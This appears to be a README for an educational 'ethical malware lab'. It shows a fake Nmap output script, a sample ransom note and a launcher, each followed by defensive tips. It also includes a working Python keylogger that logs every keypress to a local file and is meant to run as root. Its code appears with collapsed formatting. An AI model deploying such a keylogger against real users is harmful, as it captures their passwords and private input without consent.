ethical-malware-lab

Ethical Malware Lab simulates malware behaviors like keylogging, file manipulation, and infections for educational use. It helps users practice malware detection and removal in a safe, isolated environment. This project is for ethical hacking only, and should never be run on unauthorized systems.

Ethical Malware Lab

Author: [moorblocks421 or z3ro_x-)]
Project: ethical-malware-lab
Purpose: This lab simulates common malware techniques in a controlled, educational environment. It is designed for ethical hackers, cybersecurity students, and researchers who want to learn how malware behaves and how to defend against it — without endangering real systems.

---

Table of Contents

• Features
• Lab Tools & Simulations
• How to Run the Lab
• Installation
• Structure
• Disclaimer

---

Features

• Simulated keylogging
• Simulated network scanning
• Simulated ransomware messaging
• One-click script to launch the lab
• Designed for Termux, Linux, or any POSIX-compliant shell

---

Lab Tools & Simulations

1. Keylogger (Simulated)

• Path: keystroke/keylogger_sim.py
• Description: Logs user keystrokes to a local file. Uses Python and the keyboard library.
• Educational Purpose: Demonstrates how malicious keyloggers track user input.
• Note: Run with sudo or root in Termux to capture input globally.

---

2. Network Scanner (Simulated)

• Path: scanners/nmap_sim.sh
• Description: Fakes a basic Nmap scan report.
• Educational Purpose: Helps understand recon output and port enumeration.

---

3. Ransom Note (Simulated)

• Path: exploits/ransom_note_sim.txt
• Description: A harmless, fake ransom message displayed on lab launch.
• Educational Purpose: Teaches how ransomware communicates and intimidates.

---

4. Lab Launcher Script

• Path: start_lab.sh
• Description: Launches the full lab with all simulated malware behaviors.
• Use:

  bash start_lab.sh
  

1. Keylogger Simulation Script

Keylogger Simulation Script (keylogger_sim.py)

This Python script simulates the behavior of a keylogger, logging user keystrokes.

keylogger_sim.py

import keyboard # Install with 'pip install keyboard' import time

def log_keystrokes(): print("Starting keylogger simulation... Press ESC to stop.") with open("keystrokes.log", "a") as log_file: while True: event = keyboard.read_event() if event.event_type == keyboard.KEY_DOWN: log_file.write(f"{event.name}\n") log_file.flush() if event.name == 'esc': # Stop on 'ESC' print("Keylogger stopped.") break

if name == "main": log_keystrokes()

Solution to Keylogger:

Preventative Measures:

1. Use anti-malware software to detect and block keyloggers.

2. Ensure that you only install software from trusted sources.

3. Use on-screen keyboards and encryption when entering sensitive information.

4. Regularly check your system for unknown processes or applications.

---

2. Network Scanning Simulation Script

Network Scanner Simulation (nmap_sim.sh)

This bash script simulates a basic Nmap network scan. It does not actually perform a scan but outputs a simulated result.

#!/bin/bash

nmap_sim.sh

echo "Starting Nmap simulation..." echo "Simulating a basic network scan..." echo "--------------------------------------------------" echo "Nmap scan report for 192.168.1.1" echo "Host is up (0.0010s latency)." echo "Not shown: 999 filtered ports" echo "PORT STATE SERVICE" echo "22/tcp open ssh" echo "80/tcp open http" echo "443/tcp open https" echo "--------------------------------------------------"

Solution to Network Scanning:

Preventative Measures:

1. Use a firewall to block unauthorized access to open ports.

2. Disable unnecessary services (e.g., SSH, HTTP) on systems.

3. Regularly audit your network for open ports using legitimate tools.

4. Use intrusion detection systems (IDS) to detect suspicious network activity.

---

3. Ransomware Note Simulation

Ransom Note Simulation (ransom_note_sim.txt)

This text file mimics the appearance of a ransom note that might be displayed by ransomware. It is harmless.

ransom_note_sim.txt

!!!!! RANSOM NOTE !!!!!!!!

Your files have been encrypted. To get the decryption key, you need to pay 2 BTC. Failure to pay will result in permanent data loss.

Send payment to: [bitcoin-address]

DO NOT TRY TO RESTORE YOUR FILES USING BACKUPS - THEY WILL BE DELETED!

Solution to Ransomware:

Preventative Measures:

1. Backup data regularly and store backups offline or on a cloud service.

2. Use antivirus software with real-time protection.

3. Educate users on recognizing phishing attempts that deliver ransomware.

4. Keep software and systems up to date with the latest security patches.

5. Enable file access restrictions and consider using disk encryption.

---

4. Lab Launcher Script

Lab Launcher (start_lab.sh)

This script launches all of the tools in the Ethical Malware Lab, allowing for the full malware simulation experience.

#!/bin/bash

start_lab.sh

echo "Launching Ethical Malware Lab..."

Simulate Keylogger

echo "Running Keylogger Simulation..." python3 keystroke/keylogger_sim.py &

Simulate Network Scan

echo "Running Network Scanner Simulation..." bash scanners/nmap_sim.sh &

Simulate Ransom Note

echo "Displaying Ransomware Note..." cat exploits/ransom_note_sim.txt

echo "All simulations are running. Press 'ESC' to stop the keylogger." wait

Solution to Lab Launcher Security:

Preventative Measures:

1. Use sandbox environments (e.g., virtual machines) to run malware simulations.

2. Monitor the system carefully when running any malware simulation.

3. Set up virtual networks to isolate any potentially dangerous behavior.

4. Use a recovery plan that includes system snapshots for easy rollback in case of compromise.

5. Educate system administrators on how to detect and respond to simulated malware.